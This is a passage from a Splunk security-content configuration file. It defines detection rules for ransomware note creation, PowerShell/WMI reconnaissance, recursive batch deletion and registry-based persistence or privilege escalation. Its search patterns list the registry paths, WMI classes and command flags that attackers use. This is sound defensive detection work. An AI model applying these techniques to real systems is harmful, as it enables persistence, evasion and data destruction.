Ransomware", "BlackMatter Ransomware", "Chaos Ransomware", "LockBit Ransomware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=11 file_name IN ("*\.txt","*\.html","*\.hta") |bin _time span=10s | stats min(_time) as firstTime max(_time) as lastTime dc(TargetFilename) as unique_readme_path_count values(TargetFilename) as list_of_readme_path by Computer Image file_name | rename Computer as dest | where unique_readme_path_count >= 15 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ransomware_notes_bulk_creation_filter` [ESCU - Recon AVProduct Through Pwh or WMI - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 performing checks to identify anti-virus products installed on the endpoint. This technique is commonly found in malware and APT events where the adversary will map all running security applications or services. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1592"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 performing checks to identify anti-virus products installed on the endpoint. This technique is commonly found in malware and APT events where the adversary will map all running security applications or services. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = network administrator may used this command for checking purposes action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Recon AVProduct Through Pwh or WMI - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Qakbot", "Windows Post-Exploitation", "Hermetic Wiper", "Ransomware", "Prestige Ransomware", "Malicious PowerShell", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell script contains AV recon command in $ScriptBlockText$ with EventCode $EventCode$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Recon AVProduct Through Pwh or WMI - Rule action.correlationsearch.annotations = {"analytic_story": ["Qakbot", "Windows Post-Exploitation", "Hermetic Wiper", "Ransomware", "Prestige Ransomware", "Malicious PowerShell", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1592"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies suspicious PowerShell script execution via EventCode 4104 performing checks to identify anti-virus products installed on the endpoint. This technique is commonly found in malware and APT events where the adversary will map all running security applications or services. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.notable.param.rule_title = Recon AVProduct Through Pwh or WMI action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText = "*SELECT*" OR ScriptBlockText = "*WMIC*") AND (ScriptBlockText = "*AntiVirusProduct*" OR ScriptBlockText = "*AntiSpywareProduct*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `recon_avproduct_through_pwh_or_wmi_filter` [ESCU - Recon Using WMI Class - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies suspicious PowerShell via EventCode 4104, where WMI is performing an event query looking for running processes or running services. This technique is commonly found where the adversary will identify services and system information on the compromised machine. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Reconnaissance", "Installation"], "mitre_attack": ["T1592", "T1059.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies suspicious PowerShell via EventCode 4104, where WMI is performing an event query looking for running processes or running services. This technique is commonly found where the adversary will identify services and system information on the compromised machine. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = network administrator may used this command for checking purposes action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Recon Using WMI Class - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["AsyncRAT", "Qakbot", "Industroyer2", "Hermetic Wiper", "LockBit Ransomware", "Malicious PowerShell", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = A suspicious powershell script contains host recon commands detected on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 60}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 60}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Recon Using WMI Class - Rule action.correlationsearch.annotations = {"analytic_story": ["AsyncRAT", "Qakbot", "Industroyer2", "Hermetic Wiper", "LockBit Ransomware", "Malicious PowerShell", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 80, "impact": 75, "kill_chain_phases": ["Reconnaissance", "Installation"], "mitre_attack": ["T1592", "T1059.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText= "*SELECT*" OR ScriptBlockText= "*Get-WmiObject*") AND (ScriptBlockText= "*Win32_Bios*" OR ScriptBlockText= "*Win32_OperatingSystem*" OR ScriptBlockText= "*Win32_Processor*" OR ScriptBlockText= "*Win32_ComputerSystem*" OR ScriptBlockText= "*Win32_PnPEntity*" OR ScriptBlockText= "*Win32_ShadowCopy*" OR ScriptBlockText= "*Win32_DiskDrive*" OR ScriptBlockText= "*Win32_PhysicalMemory*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `recon_using_wmi_class_filter` [ESCU - Recursive Delete of Directory In Batch CMD - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious commandline designed to delete files or directory recursive using batch command. This technique was seen in ransomware (reddot) where it it tries to delete the files in recycle bin to impaire user from recovering deleted files. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.004", "T1070"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious commandline designed to delete files or directory recursive using batch command. This technique was seen in ransomware (reddot) where it it tries to delete the files in recycle bin to impaire user from recovering deleted files. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = network operator may use this batch command to delete recursively a directory or files within directory action.escu.creation_date = 2022-11-12 action.escu.modification_date = 2022-11-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Recursive Delete of Directory In Batch CMD - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware"] action.risk = 1 action.risk.param._risk_message = Recursive Delete of Directory In Batch CMD by $user$ on $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Recursive Delete of Directory In Batch CMD - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.004", "T1070"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious commandline designed to delete files or directory recursive using batch command. This technique was seen in ransomware (reddot) where it it tries to delete the files in recycle bin to impaire user from recovering deleted files. action.notable.param.rule_title = Recursive Delete of Directory In Batch CMD action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` Processes.process=*/c* Processes.process="* rd *" Processes.process="*/s*" Processes.process="*/q*" by Processes.user Processes.process_name Processes.parent_process_name Processes.parent_process Processes.process Processes.process_id Processes.dest |`drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `recursive_delete_of_directory_in_batch_cmd_filter` [ESCU - Reg exe Manipulating Windows Services Registry Keys - Rule] action.escu = 0 action.escu.enabled = 1 description = The search looks for reg.exe modifying registry keys that define Windows services and their configurations. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.011", "T1574"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for reg.exe modifying registry keys that define Windows services and their configurations. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is unusual for a service to be created or modified by directly manipulating the registry. However, there may be legitimate instances of this behavior. It is important to validate and investigate, as appropriate. action.escu.creation_date = 2020-11-26 action.escu.modification_date = 2020-11-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Reg exe Manipulating Windows Services Registry Keys - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Service Abuse", "Windows Persistence Techniques", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = A reg.exe process $process_name$ with commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Reg exe Manipulating Windows Services Registry Keys - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Service Abuse", "Windows Persistence Techniques", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 60, "impact": 75, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.011", "T1574"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for reg.exe modifying registry keys that define Windows services and their configurations. action.notable.param.rule_title = Reg exe Manipulating Windows Services Registry Keys action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process_name) as process_name values(Processes.parent_process_name) as parent_process_name values(Processes.user) as user FROM datamodel=Endpoint.Processes where Processes.process_name=reg.exe Processes.process=*reg* Processes.process=*add* Processes.process=*Services* by Processes.process_id Processes.dest Processes.process | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `reg_exe_manipulating_windows_services_registry_keys_filter` [ESCU - Registry Keys for Creating SHIM Databases - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for registry activity associated with application compatibility shims, which can be leveraged by attackers for various nefarious purposes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.011", "T1546"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for registry activity associated with application compatibility shims, which can be leveraged by attackers for various nefarious purposes. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = There are many legitimate applications that leverage shim databases for compatibility purposes for legacy applications action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Registry Keys for Creating SHIM Databases - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Windows Registry Activities", "Windows Persistence Techniques", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = A registry activity in $registry_path$ related to shim modication in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Registry Keys for Creating SHIM Databases - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Windows Registry Activities", "Windows Persistence Techniques", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.011", "T1546"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for registry activity associated with application compatibility shims, which can be leveraged by attackers for various nefarious purposes. action.notable.param.rule_title = Registry Keys for Creating SHIM Databases action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=*CurrentVersion\\AppCompatFlags\\Custom* OR Registry.registry_path=*CurrentVersion\\AppCompatFlags\\InstalledSDB*) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `registry_keys_for_creating_shim_databases_filter` [ESCU - Registry Keys Used For Persistence - Rule] action.escu = 0 action.escu.enabled = 1 description = The search looks for modifications or alterations made to registry keys that have the potential to initiate the launch of an application or service during system startup. By monitoring and detecting modifications in these registry keys, we can identify suspicious or unauthorized changes that could be indicative of malicious activity. This proactive approach helps in safeguarding the system's integrity and security by promptly identifying and mitigating potential threats that aim to gain persistence or execute malicious actions during the startup process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.001", "T1547"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for modifications or alterations made to registry keys that have the potential to initiate the launch of an application or service during system startup. By monitoring and detecting modifications in these registry keys, we can identify suspicious or unauthorized changes that could be indicative of malicious activity. This proactive approach helps in safeguarding the system's integrity and security by promptly identifying and mitigating potential threats that aim to gain persistence or execute malicious actions during the startup process. action.escu.how_to_implement = To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the endpoint data model in the registry node. This is typically populated via endpoint detection-and-response product, such as Carbon Black or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry. action.escu.known_false_positives = There are many legitimate applications that must execute on system startup and will use these registry keys to accomplish that task. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Registry Keys Used For Persistence - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AsyncRAT", "Ransomware", "Windows Persistence Techniques", "DarkGate Malware", "NjRAT", "RedLine Stealer", "IcedID", "Sneaky Active Directory Persistence Tricks", "Chaos Ransomware", "Azorult", "DHS Report TA18-074A", "Emotet Malware DHS Report TA18-201A", "Remcos", "Windows Registry Abuse", "Qakbot", "Suspicious MSHTA Activity", "Suspicious Windows Registry Activities", "Warzone RAT", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Amadey", "BlackByte Ransomware", "CISA AA23-347A", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = A registry activity in $registry_path$ related to persistence in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 76}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 76}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Registry Keys Used For Persistence - Rule action.correlationsearch.annotations = {"analytic_story": ["AsyncRAT", "Ransomware", "Windows Persistence Techniques", "DarkGate Malware", "NjRAT", "RedLine Stealer", "IcedID", "Sneaky Active Directory Persistence Tricks", "Chaos Ransomware", "Azorult", "DHS Report TA18-074A", "Emotet Malware DHS Report TA18-201A", "Remcos", "Windows Registry Abuse", "Qakbot", "Suspicious MSHTA Activity", "Suspicious Windows Registry Activities", "Warzone RAT", "Possible Backdoor Activity Associated With MUDCARP Espionage Campaigns", "Amadey", "BlackByte Ransomware", "CISA AA23-347A", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 95, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1547.001", "T1547"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for modifications or alterations made to registry keys that have the potential to initiate the launch of an application or service during system startup. By monitoring and detecting modifications in these registry keys, we can identify suspicious or unauthorized changes that could be indicative of malicious activity. This proactive approach helps in safeguarding the system's integrity and security by promptly identifying and mitigating potential threats that aim to gain persistence or execute malicious actions during the startup process. action.notable.param.rule_title = Registry Keys Used For Persistence action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where (Registry.registry_path=*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce OR Registry.registry_path=*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run OR Registry.registry_path= "*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\*" OR Registry.registry_path= "*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\*" OR Registry.registry_path=*\\currentversion\\run* OR Registry.registry_path=*\\currentVersion\\Windows\\Appinit_Dlls* OR Registry.registry_path=*\\CurrentVersion\\Winlogon\\Shell* OR Registry.registry_path=*\\CurrentVersion\\Winlogon\\Notify* OR Registry.registry_path=*\\CurrentVersion\\Winlogon\\Userinit* OR Registry.registry_path=*\\CurrentVersion\\Winlogon\\VmApplet* OR Registry.registry_path=*\\currentversion\\policies\\explorer\\run* OR Registry.registry_path=*\\currentversion\\runservices* OR Registry.registry_path=HKLM\\SOFTWARE\\Microsoft\\Netsh\\* OR Registry.registry_path= "*\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Startup" OR Registry.registry_path= *\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SharedTaskScheduler OR Registry.registry_path= *\\Classes\\htmlfile\\shell\\open\\command OR (Registry.registry_path="*Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options*" AND Registry.registry_key_name=Debugger) OR (Registry.registry_path="*\\CurrentControlSet\\Control\\Lsa" AND Registry.registry_key_name="Security Packages") OR (Registry.registry_path="*\\CurrentControlSet\\Control\\Lsa\\OSConfig" AND Registry.registry_key_name="Security Packages") OR (Registry.registry_path="*\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\*") OR (Registry.registry_path="*currentVersion\\Windows" AND Registry.registry_key_name="Load") OR (Registry.registry_path="*\\CurrentVersion" AND Registry.registry_key_name="Svchost") OR (Registry.registry_path="*\\CurrentControlSet\Control\Session Manager"AND Registry.registry_key_name="BootExecute") OR (Registry.registry_path="*\\Software\\Run" AND Registry.registry_key_name="auto_update")) by Registry.dest Registry.user Registry.registry_path Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.registry_key_name | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `registry_keys_used_for_persistence_filter` [ESCU - Registry Keys Used For Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for modifications to registry keys that can be used to elevate privileges. The registry keys under "Image File Execution Options" are used to intercept calls to an executable and can be used to attach malicious binaries to benign system binaries. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.012", "T1546"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for modifications to registry keys that can be used to elevate privileges. The registry keys under "Image File Execution Options" are used to intercept calls to an executable and can be used to attach malicious binaries to benign system binaries. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = There are many legitimate applications that must execute upon system startup and will use these registry keys to accomplish that task. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Registry Keys Used For Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Cloud Federated Credential Abuse", "Hermetic Wiper", "Windows Privilege Escalation", "Windows Registry Abuse", "Data Destruction", "Suspicious Windows Registry Activities"] action.risk = 1 action.risk.param._risk_message = A registry activity in $registry_path$ related to privilege escalation in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 76}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 76}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Registry Keys Used For Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Cloud Federated Credential Abuse", "Hermetic Wiper", "Windows Privilege Escalation", "Windows Registry Abuse", "Data Destruction", "Suspicious Windows Registry Activities"], "cis20": ["CIS 10"], "confidence": 95, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.012", "T1546"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for modifications to registry keys that can be used to elevate privileges. The registry keys under "Image File Execution Options" are used to intercept calls to an executable and can be used to attach malicious binaries to benign system binaries. action.notable.param.rule_title = Registry Keys Used For Privilege Escalation action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path="*Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options*") AND (Registry.registry_value_name=GlobalFlag OR Registry.registry_value_name=Debugger)) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `registry_keys_used_for_privilege_escalation_filter` [ESCU - Regsvr32 Silent and Install Param Dll Loading - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a loading of dll using regsvr32 application with silent parameter and dllinstall execution. This technique was seen in several RAT malware similar to remcos, njrat and adversaries to load their malicious DLL on the compromised machine. This TTP may executed by normal 3rd party application so it is better to pivot by the parent process, parent command-line and command-line of the file that execute this regsvr32. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a loading of dll using regsvr32 application with silent parameter and dllinstall execution. This technique was seen in several RAT malware similar to remcos, njrat and adversaries to load their malicious DLL on the compromised machine. This TTP may executed by normal 3rd party application so it is better to pivot by the parent process, parent command-line and command-line of the file that execute this regsvr32. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Other third part application may used this parameter but not so common in base windows environment. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Regsvr32 Silent and Install Param Dll Loading - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AsyncRAT", "Hermetic Wiper", "Living Off The Land", "Data Destruction", "Remcos", "Suspicious Regsvr32 Activity"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to load a DLL using the silent and dllinstall parameter. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 36}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Regsvr32 Silent and Install Param Dll Loading - Rule action.correlationsearch.annotations = {"analytic_story": ["AsyncRAT", "Hermetic Wiper", "Living Off The Land", "Data Destruction", "Remcos", "Suspicious Regsvr32 Activity"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.AE"]} 